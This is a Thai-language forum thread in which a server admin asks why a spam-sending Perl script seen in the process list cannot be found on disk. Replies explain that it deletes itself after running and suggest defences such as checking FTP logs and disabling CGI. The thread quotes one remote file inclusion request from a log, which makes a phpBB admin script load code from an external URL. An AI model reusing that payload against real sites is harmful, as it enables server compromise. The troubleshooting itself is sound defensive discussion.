ไม่สามารถหา file ที่ โดนแอบวางได้นะครับ

คือมีปัญหาว่ามีคนมาแอบ วาง script perl .pl แล้วก็เรียก ส่งเมล์ไป spam คนอื่น

หาใน ps auxww
เจอ
./admirably.pl
./admirably.pl

แต่ผมไปค้นหา

find / -name admirably.pl

กลับไม่เจอนะครับ แบบนี้ มันเพราะอะไรเหรอครับ อ๋อทำการ secure /tmp แล้วด้วย แต่ก็ยังโดนเรียกอยู่ดี ขอบคุณครับ

เจอแบบนี้ใน log ลุกค้าไม่รู้วาน่าจะใช่ไหมครับ

/modules.php?name=Asers_Shop&s_op=viewproduct&cid=5%20%20//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://itnews.or.kr/id1.txt?

นั่นล่ะครับตัวรั่ว

ที่ไม่เจอเพราะมัน ftp เข้ามาวาง
พอ run อยู่ใน mem แล้ว ก็ ftp ลบไฟล์ออกเลย

น่าจะสามารถตรวจพบได้จาก ftp log ครับ

ลองลบ file ดังกล่าวแล้วก็ไม่หายนะครับ

เดี๋ยวลองเช็ค log ftp ดูครับ

มีวาง shell อะไรไว้แล้วละมั้งครับงานนี้
ไล่ process ละเอียดๆ เลย
แล้วดู log ให้หมด

ปิด CGI สิครับ
ผมเคยเตือนเรื่องนี้มาหลายรอบแล้ว
มันใช้รูโหว่ของ CMS เจาะเข้ามา วาง script พอมัน run แล้วก็จะลบไฟล์ script นั้นๆออก
ถ้าเว็บนั้นไม่ได้ใช้งาน CGI ก็ปิดไปเลยครับ